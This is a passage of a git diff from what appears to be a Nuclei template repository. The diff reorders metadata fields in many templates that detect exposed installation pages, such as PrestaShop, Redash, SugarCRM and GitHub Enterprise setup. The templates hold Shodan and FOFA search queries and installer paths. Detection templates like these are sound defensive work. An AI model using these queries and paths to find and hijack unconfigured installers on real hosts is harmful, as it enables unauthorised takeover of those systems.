4a0a00473045022100eeddac8af33ba19fd2bfab6bbd54b0161f3c93e0247010be93bceee0da5c140402207100dd147f60943aaa53e1183e09e7886871302d663be5d0b0dcb97c7b9f11fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/pmm-installer.yaml b/http/misconfiguration/installer/pmm-installer.yaml index 02f5332d29..15f45a2a02 100644 --- a/http/misconfiguration/installer/pmm-installer.yaml +++ b/http/misconfiguration/installer/pmm-installer.yaml @@ -5,16 +5,16 @@ info: author: pussycat0x severity: high description: PMM is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:percona:monitoring_and_management:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"PMM Installation Wizard" - product: monitoring_and_management vendor: percona + product: monitoring_and_management + shodan-query: http.title:"PMM Installation Wizard" tags: misconfig,exposure,install,pmm - classification: - cpe: cpe:2.3:a:percona:monitoring_and_management:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e17140e1a9563e94bf1baead9a092319666bf36480dffafa9a21a63b9fcdb391022100c03f393fedc23e1b9eb11a2b1596fbec8332f45bbeb496c84d76dbbfc7f214a4:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100e17140e1a9563e94bf1baead9a092319666bf36480dffafa9a21a63b9fcdb391022100c03f393fedc23e1b9eb11a2b1596fbec8332f45bbeb496c84d76dbbfc7f214a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/poste-io-installer.yaml b/http/misconfiguration/installer/poste-io-installer.yaml index ac092b87cc..89f3a3d40c 100644 --- a/http/misconfiguration/installer/poste-io-installer.yaml +++ b/http/misconfiguration/installer/poste-io-installer.yaml @@ -6,16 +6,16 @@ info: severity: high description: | Poste.io is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:analogic:poste.io:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: body="Initial server configuration" - product: poste.io vendor: analogic + product: poste.io + fofa-query: body="Initial server configuration" tags: misconfig,exposure,poste-io,install - classification: - cpe: cpe:2.3:a:analogic:poste.io:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100da8af244ae67997355b3d9c3f502fd2f07889bc87e33b42656b83d9551a1e3a1022074bebb13f7565d53bf8bac225bad94cb311502f85a7849a721d369ef0176de6a:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100da8af244ae67997355b3d9c3f502fd2f07889bc87e33b42656b83d9551a1e3a1022074bebb13f7565d53bf8bac225bad94cb311502f85a7849a721d369ef0176de6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/prestashop-installer.yaml b/http/misconfiguration/installer/prestashop-installer.yaml index e66944616e..797827dc63 100644 --- a/http/misconfiguration/installer/prestashop-installer.yaml +++ b/http/misconfiguration/installer/prestashop-installer.yaml @@ -5,16 +5,16 @@ info: author: tess severity: high description: Prestashop is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:prestashop:prestashop:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"PrestaShop Installation Assistant" - product: prestashop vendor: prestashop + product: prestashop + shodan-query: title:"PrestaShop Installation Assistant" tags: misconfig,prestashop,exposure,install - classification: - cpe: cpe:2.3:a:prestashop:prestashop:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a30533126e8bda3720627039bfd0a31e2f2bbd17cc62c347b3ddbf8acbf870970220314eed5d5caf09735ef9d5d9c106f5311ffba5d158bc5777b5cd8bcd62903801:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100a30533126e8bda3720627039bfd0a31e2f2bbd17cc62c347b3ddbf8acbf870970220314eed5d5caf09735ef9d5d9c106f5311ffba5d158bc5777b5cd8bcd62903801:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/processwire-installer.yaml b/http/misconfiguration/installer/processwire-installer.yaml index 5d82234006..2fc1c386df 100644 --- a/http/misconfiguration/installer/processwire-installer.yaml +++ b/http/misconfiguration/installer/processwire-installer.yaml @@ -5,16 +5,16 @@ info: author: pussycat0x severity: unknown description: ProcessWire 3.x is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: title:"ProcessWire 3.x Installer" - product: processwire vendor: processwire + product: processwire + shodan-query: title:"ProcessWire 3.x Installer" tags: misconfig,processwire,install,exposure - classification: - cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c9040333d464ee74f38bb8f6bf7f9ebce6d974486b7350ee3cad1e01ac28f9d702205d65792631cf1873f7669e346c45e7bc7e29e2ded46d3f11fe0847a25cac5801:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100c9040333d464ee74f38bb8f6bf7f9ebce6d974486b7350ee3cad1e01ac28f9d702205d65792631cf1873f7669e346c45e7bc7e29e2ded46d3f11fe0847a25cac5801:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/projectsend-installer.yaml b/http/misconfiguration/installer/projectsend-installer.yaml index f7766545bd..660c425038 100644 --- a/http/misconfiguration/installer/projectsend-installer.yaml +++ b/http/misconfiguration/installer/projectsend-installer.yaml @@ -8,16 +8,16 @@ info: Detects exposed ProjectSend installation page. reference: - https://www.projectsend.org/ + classification: + cpe: cpe:2.3:a:projectsend:projectsend:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"ProjectSend setup" - product: projectsend vendor: projectsend + product: projectsend + shodan-query: html:"ProjectSend setup" tags: misconfig,install,exposure,projectsend - classification: - cpe: cpe:2.3:a:projectsend:projectsend:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,6 +25,7 @@ http: - "{{BaseURL}}/install/make-config.php" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -35,4 +36,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022041d7f7b7fc7194bc9ecab9aec4682b69587b2a03b9dcebf694cfd9e85688754202206bdf942b3342aebf617db7fabc9e276da0cebb2f27a5e585310e85b9ac04210f:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022041d7f7b7fc7194bc9ecab9aec4682b69587b2a03b9dcebf694cfd9e85688754202206bdf942b3342aebf617db7fabc9e276da0cebb2f27a5e585310e85b9ac04210f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/qloapps-installer.yaml b/http/misconfiguration/installer/qloapps-installer.yaml index 935753ea65..c31ed96876 100644 --- a/http/misconfiguration/installer/qloapps-installer.yaml +++ b/http/misconfiguration/installer/qloapps-installer.yaml @@ -6,16 +6,16 @@ info: severity: high description: | QloApps Installation Assistant panel exposure. + classification: + cpe: cpe:2.3:a:webkul:qloapps:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: title="QloApps Installation" - product: qloapps vendor: webkul + product: qloapps + fofa-query: title="QloApps Installation" tags: install,qloapps,misconfig,exposure - classification: - cpe: cpe:2.3:a:webkul:qloapps:*:*:*:*:*:*:*:* http: - method: GET path: @@ -23,6 +23,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -34,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f3866d0a7114f2638451a3c05ef701c0dc2fc2e0d5a16f36b427743f28b16763022100ac4f98fcc0ddbdb5e562b07861b45a99fa1d3525cb1d8d031d3708a4db77558c:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100f3866d0a7114f2638451a3c05ef701c0dc2fc2e0d5a16f36b427743f28b16763022100ac4f98fcc0ddbdb5e562b07861b45a99fa1d3525cb1d8d031d3708a4db77558c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/redash-installer.yaml b/http/misconfiguration/installer/redash-installer.yaml index a5b987353b..f5b5d6814d 100644 --- a/http/misconfiguration/installer/redash-installer.yaml +++ b/http/misconfiguration/installer/redash-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: Redash is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Redash Initial Setup" - product: redash vendor: redash + product: redash + shodan-query: html:"Redash Initial Setup" tags: misconfig,redash,install - classification: - cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022064f031391e9c6c891e951110b7f75ed21337e7a8022dd361580d20ee11805d40022100c9ef80338c794a6b3fcad1bd780b60806001a47582fd37a6a8447e86052ebe54:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022064f031391e9c6c891e951110b7f75ed21337e7a8022dd361580d20ee11805d40022100c9ef80338c794a6b3fcad1bd780b60806001a47582fd37a6a8447e86052ebe54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/sabnzbd-installer.yaml b/http/misconfiguration/installer/sabnzbd-installer.yaml index 26f29ba9a9..e2039d5ddd 100644 --- a/http/misconfiguration/installer/sabnzbd-installer.yaml +++ b/http/misconfiguration/installer/sabnzbd-installer.yaml @@ -8,17 +8,17 @@ info: Default installation wizard page of SABnzbd was discovered. reference: - https://www.sabnzbd.org/ + classification: + cpe: cpe:2.3:a:sabnzbd:sabnzbd:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 + vendor: sabnzbd + product: sabnzbd shodan-query: html:"SABnzbd Quick-Start Wizard" fofa-query: body="SABnzbd Quick-Start Wizard" - product: sabnzbd - vendor: sabnzbd tags: sabnzbd,wizard,installer,misconfig - classification: - cpe: cpe:2.3:a:sabnzbd:sabnzbd:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,6 +26,7 @@ http: - "{{BaseURL}}/wizard/" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -36,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e0f82c995b6a686d3028d757d7b32b9cfe867077f24b73d12bb70b78cb1f07b1022100d39bd3dfca7af6030eb799c7a3edf07645f7b7f2b2943901ef8a999c2be63e16:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100e0f82c995b6a686d3028d757d7b32b9cfe867077f24b73d12bb70b78cb1f07b1022100d39bd3dfca7af6030eb799c7a3edf07645f7b7f2b2943901ef8a999c2be63e16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/server-monitor-installer.yaml b/http/misconfiguration/installer/server-monitor-installer.yaml index 0a1d1f3c20..3161647f45 100644 --- a/http/misconfiguration/installer/server-monitor-installer.yaml +++ b/http/misconfiguration/installer/server-monitor-installer.yaml @@ -5,16 +5,16 @@ info: author: tess severity: high description: Server Monitor is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:poweradmin:pa_server_monitor:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"SERVER MONITOR - Install" - product: pa_server_monitor vendor: poweradmin + product: pa_server_monitor + shodan-query: title:"SERVER MONITOR - Install" tags: misconfig,monitor,exposure,install - classification: - cpe: cpe:2.3:a:poweradmin:pa_server_monitor:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200b7f436c2808b9457a5469cf8930b006f5036ddbbeb702b60e3ef3999214897502210089fb2e4bdeddc5880309778bfe3a18bd092f8eb7dacd6cfac5c30ccad01789ff:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502200b7f436c2808b9457a5469cf8930b006f5036ddbbeb702b60e3ef3999214897502210089fb2e4bdeddc5880309778bfe3a18bd092f8eb7dacd6cfac5c30ccad01789ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/setup-github-enterprise.yaml b/http/misconfiguration/installer/setup-github-enterprise.yaml index ea62462364..5f2a183658 100644 --- a/http/misconfiguration/installer/setup-github-enterprise.yaml +++ b/http/misconfiguration/installer/setup-github-enterprise.yaml @@ -4,16 +4,16 @@ info: name: Setup GitHub Enterprise - Detect author: tess severity: unknown + classification: + cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:-1373456171 - product: enterprise_server vendor: github + product: enterprise_server + shodan-query: http.favicon.hash:-1373456171 tags: misconfig,installer,github,setup - classification: - cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100911c30fdb8aa2b865bb630663e66aa292b65b0e91a21c955154bf6987844f57c022100a67b5578341817f8a797a7aa42e7da1defe873e526ae86e1556bbce22aaaff10:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100911c30fdb8aa2b865bb630663e66aa292b65b0e91a21c955154bf6987844f57c022100a67b5578341817f8a797a7aa42e7da1defe873e526ae86e1556bbce22aaaff10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/shopware-installer.yaml b/http/misconfiguration/installer/shopware-installer.yaml index 3cb835607a..20105f6cbf 100644 --- a/http/misconfiguration/installer/shopware-installer.yaml +++ b/http/misconfiguration/installer/shopware-installer.yaml @@ -7,16 +7,16 @@ info: description: Shopware is susceptible to the Installation page exposure due to misconfiguration. reference: - https://www.shopware.com/en/ + classification: + cpe: cpe:2.3:a:shopware:shopware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: title="Installation | Shopware 6" - product: shopware vendor: shopware + product: shopware + fofa-query: title="Installation | Shopware 6" tags: misconfig,shopware,install,exposure - classification: - cpe: cpe:2.3:a:shopware:shopware:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c49d7dd7b97eb87d5b4de3f9e09232a82505cd82cf325da8d921f8ae060ba4f4022100a7a8fbaacad106a6f9797a34c058e728821f47099467a86276a92d3bc3a55cd1:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100c49d7dd7b97eb87d5b4de3f9e09232a82505cd82cf325da8d921f8ae060ba4f4022100a7a8fbaacad106a6f9797a34c058e728821f47099467a86276a92d3bc3a55cd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/smf-installer.yaml b/http/misconfiguration/installer/smf-installer.yaml index 8ba36f3413..ac25d75ec1 100644 --- a/http/misconfiguration/installer/smf-installer.yaml +++ b/http/misconfiguration/installer/smf-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: SMF is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:simplemachines:simple_machine_forum:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"SMF Installer" - product: simple_machine_forum vendor: simplemachines + product: simple_machine_forum + shodan-query: title:"SMF Installer" tags: misconfig,smf,install,exposure - classification: - cpe: cpe:2.3:a:simplemachines:simple_machine_forum:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220208d7404afcad5ede18fa45f5353583c132e2a86b100143fbe92f1ea44e4e2e0022057ca90a574c898e061c684a87d1e98d09c274353490e4fce4e4fc597ff7edc69:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220208d7404afcad5ede18fa45f5353583c132e2a86b100143fbe92f1ea44e4e2e0022057ca90a574c898e061c684a87d1e98d09c274353490e4fce4e4fc597ff7edc69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/snipe-it-installer.yaml b/http/misconfiguration/installer/snipe-it-installer.yaml index 12d0bf6411..ebcad22a6c 100644 --- a/http/misconfiguration/installer/snipe-it-installer.yaml +++ b/http/misconfiguration/installer/snipe-it-installer.yaml @@ -8,16 +8,16 @@ info: Detects exposed Snipe-IT Setup page. reference: - https://snipeitapp.com/ + classification: + cpe: cpe:2.3:a:snipeitapp:snipe-it:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Snipe-IT Setup" - product: snipe-it vendor: snipeitapp + product: snipe-it + shodan-query: html:"Snipe-IT Setup" tags: misconfig,install,exposure,snipe-it - classification: - cpe: cpe:2.3:a:snipeitapp:snipe-it:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402207a3b4baa4a918064800581dcaff661d882f28a67664025f3e136be3ee66a483c02201bb5a2fcba8eecf549d033d9a21eff12e0c39818f512ba9b7ecb543528686116:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402207a3b4baa4a918064800581dcaff661d882f28a67664025f3e136be3ee66a483c02201bb5a2fcba8eecf549d033d9a21eff12e0c39818f512ba9b7ecb543528686116:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/spa-cart-installer.yaml b/http/misconfiguration/installer/spa-cart-installer.yaml index 13ffd09108..3e76dd44c4 100644 --- a/http/misconfiguration/installer/spa-cart-installer.yaml +++ b/http/misconfiguration/installer/spa-cart-installer.yaml @@ -7,15 +7,15 @@ info: description: SPA Cart installer was found. reference: - https://spa-cart.com/ - metadata: - max-request: 1 - fofa-query: title="SPA Cart Installation" - product: spa-cart - vendor: spa-cart - tags: spa-cart,exposure,installer,misconfig - classification: cpe: cpe:2.3:a:spa-cart:spa-cart:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: spa-cart + product: spa-cart + fofa-query: title="SPA Cart Installation" + tags: spa-cart,exposure,installer,misconfig + http: - method: GET path: @@ -33,4 +33,4 @@ http: status: - 200 -# digest: 4a0a00473045022100c09a075668a57e2d44045c4514e35e620d873c092058b30c3a1e02328aa2406802201c2d079dca0ab6762bee18dc881e0c9a434ada56ebf406148800a2639d1a6c46:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c09a075668a57e2d44045c4514e35e620d873c092058b30c3a1e02328aa2406802201c2d079dca0ab6762bee18dc881e0c9a434ada56ebf406148800a2639d1a6c46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/subrion-installer.yaml b/http/misconfiguration/installer/subrion-installer.yaml index e7c5886539..9ad4bba51c 100644 --- a/http/misconfiguration/installer/subrion-installer.yaml +++ b/http/misconfiguration/installer/subrion-installer.yaml @@ -8,16 +8,16 @@ info: Subrion CMS Web Installer has been exposed. reference: - https://github.com/intelliants/subrion + classification: + cpe: cpe:2.3:a:intelliants:subrion:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: title="Subrion CMS Web Installer" - product: subrion vendor: intelliants + product: subrion + fofa-query: title="Subrion CMS Web Installer" tags: subrion,cms,install,misconfig - classification: - cpe: cpe:2.3:a:intelliants:subrion:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c21c25939a762dba12a071f9f6000af22a6b8640ceae95652a27810df62cb5850221009e24a5b294bc966e32cfda4cc151aaa159d927756b0d610b0933fa147e2832ea:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100c21c25939a762dba12a071f9f6000af22a6b8640ceae95652a27810df62cb5850221009e24a5b294bc966e32cfda4cc151aaa159d927756b0d610b0933fa147e2832ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/sugarcrm-install.yaml b/http/misconfiguration/installer/sugarcrm-install.yaml index 996a7ddb96..e394f2a73f 100644 --- a/http/misconfiguration/installer/sugarcrm-install.yaml +++ b/http/misconfiguration/installer/sugarcrm-install.yaml @@ -5,16 +5,16 @@ info: author: ritikchaddha severity: high description: SugarCRM is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:sugarcrm:sugarcrm:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Sugar Setup Wizard" - product: sugarcrm vendor: sugarcrm + product: sugarcrm + shodan-query: title:"Sugar Setup Wizard" tags: misconfig,sugar,sugarcrm,install - classification: - cpe: cpe:2.3:a:sugarcrm:sugarcrm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204aa5775363df16fcc9b7177b7e5535656387f69878298b7114308780795e43fb022100e3cc8bd09ff81291094aecb1097c7e2ae8d418f78225929896f5917f23a5fdc4:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502204aa5775363df16fcc9b7177b7e5535656387f69878298b7114308780795e43fb022100e3cc8bd09ff81291094aecb1097c7e2ae8d418f78225929896f5917f23a5fdc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/suitecrm-installer.yaml b/http/misconfiguration/installer/suitecrm-installer.yaml index 5aebcf0511..b5dd34ea74 100644 --- a/http/misconfiguration/installer/suitecrm-installer.yaml +++ b/http/misconfiguration/installer/suitecrm-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: SuiteCRM is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"SuiteCRM" - product: suitecrm vendor: salesagility + product: suitecrm + shodan-query: title:"SuiteCRM" tags: misconfig,suitecrm,install - classification: - cpe: cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cba48866ad1b5132d0f306077db31f4c2b1444727f506cc2560f848f9149db0a0220051ea86c09ac1bac18920cbc53c7b8cc59e604ca67f3d4f7c6ce53e75af8c0d9:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100cba48866ad1b5132d0f306077db31f4c2b1444727f506cc2560f848f9149db0a0220051ea86c09ac1bac18920cbc53c7b8cc59e604ca67f3d4f7c6ce53e75af8c0d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/tasmota-install.yaml b/http/misconfiguration/installer/tasmota-install.yaml index 0077e8d9c6..9d52ff4e07 100644 --- a/http/misconfiguration/installer/tasmota-install.yaml +++ b/http/misconfiguration/installer/tasmota-install.yaml @@ -5,16 +5,16 @@ info: author: ritikchaddha severity: high description: Tasmota is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:o:tasmota_project:tasmota:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Tasmota" - product: tasmota vendor: tasmota_project + product: tasmota + shodan-query: title:"Tasmota" tags: misconfig,tasmota,install,exposure - classification: - cpe: cpe:2.3:o:tasmota_project:tasmota:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022019eb38378f3d40f8a2f71fe25698efcee2357dec42b9514d95569c4fededa82a022100c812c07241e7e713db02ddaee366af9cb5670963e643898126265238791ead54:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022019eb38378f3d40f8a2f71fe25698efcee2357dec42b9514d95569c4fededa82a022100c812c07241e7e713db02ddaee366af9cb5670963e643898126265238791ead54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/tastyigniter-installer.yaml b/http/misconfiguration/installer/tastyigniter-installer.yaml index 711dd56277..54712e9c72 100644 --- a/http/misconfiguration/installer/tastyigniter-installer.yaml +++ b/http/misconfiguration/installer/tastyigniter-installer.yaml @@ -8,16 +8,16 @@ info: Detects exposed TastyIgniter Setup page. reference: - https://tastyigniter.com/ + classification: + cpe: cpe:2.3:a:tastyigniter:tastyigniter:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: body="TastyIgniter - Setup - License agreement" - product: tastyigniter vendor: tastyigniter + product: tastyigniter + fofa-query: body="TastyIgniter - Setup - License agreement" tags: misconfig,install,exposure,tastyigniter - classification: - cpe: cpe:2.3:a:tastyigniter:tastyigniter:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022039e2c4807f395e7435256b8058fadc16da77b4dff33061231baa9c4437b7cdf502203554057a981d56294d48f2244347267d8a5a8c677743a75ca434209388fd7ce6:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022039e2c4807f395e7435256b8058fadc16da77b4dff33061231baa9c4437b7cdf502203554057a981d56294d48f2244347267d8a5a8c677743a75ca434209388fd7ce6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/tautulli-install.yaml b/http/misconfiguration/installer/tautulli-install.yaml index e40383362d..3878546321 100644 --- a/http/misconfiguration/installer/tautulli-install.yaml +++ b/http/misconfiguration/installer/tautulli-install.yaml @@ -5,16 +5,16 @@ info: author: ritikchaddha severity: high description: Tautulli is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Tautulli - Welcome" - product: tautulli vendor: tautulli + product: tautulli + shodan-query: title:"Tautulli - Welcome" tags: misconfig,tautulli,install - classification: - cpe: cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bfe29789f1c1752dab4a78bca7cd9aa515a3650baa916d8e4588bdcacd0476ea022018454d3ca30b089180fc1abadcc3490ed3cf0092caa9b50d62472e88792e1211:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100bfe29789f1c1752dab4a78bca7cd9aa515a3650baa916d8e4588bdcacd0476ea022018454d3ca30b089180fc1abadcc3490ed3cf0092caa9b50d62472e88792e1211:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/testrail-install.yaml b/http/misconfiguration/installer/testrail-install.yaml index d342672e85..8f77e56047 100644 --- a/http/misconfiguration/installer/testrail-install.yaml +++ b/http/misconfiguration/installer/testrail-install.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: TestRail is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:gurock:testrail:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"TestRail Installation Wizard" - product: testrail vendor: gurock + product: testrail + shodan-query: title:"TestRail Installation Wizard" tags: misconfig,testrail,install,exposure - classification: - cpe: cpe:2.3:a:gurock:testrail:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009dea75a2e3208eef747084522cafdcffc7d9f7e4044f85e971eb04eba0e3abc8022100cb3d62958931d47e671428b921db2276c50a03bdff03724413d1ad3900f402d6:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a004830460221009dea75a2e3208eef747084522cafdcffc7d9f7e4044f85e971eb04eba0e3abc8022100cb3d62958931d47e671428b921db2276c50a03bdff03724413d1ad3900f402d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/tiny-rss-installer.yaml b/http/misconfiguration/installer/tiny-rss-installer.yaml index 9bab296958..eadb63789b 100644 --- a/http/misconfiguration/installer/tiny-rss-installer.yaml +++ b/http/misconfiguration/installer/tiny-rss-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: Tiny Tiny RSS is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:tt-rss:tiny_tiny_rss:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Tiny Tiny RSS - Installer" - product: tiny_tiny_rss vendor: tt-rss + product: tiny_tiny_rss + shodan-query: title:"Tiny Tiny RSS - Installer" tags: misconfig,tiny,install - classification: - cpe: cpe:2.3:a:tt-rss:tiny_tiny_rss:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210083b4a48cf305430a1d931083d367431cce419d274f67aea43aed3defd301a6b602202cfdbc94460a8808da4f9f12d6186890f744e7bb9f1164a7ea1ad2aa978bc16b:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502210083b4a48cf305430a1d931083d367431cce419d274f67aea43aed3defd301a6b602202cfdbc94460a8808da4f9f12d6186890f744e7bb9f1164a7ea1ad2aa978bc16b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/typo3-installer.yaml b/http/misconfiguration/installer/typo3-installer.yaml index e3332ee2b9..e23e1890bd 100644 --- a/http/misconfiguration/installer/typo3-installer.yaml +++ b/http/misconfiguration/installer/typo3-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: medium description: TYPO3 is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: 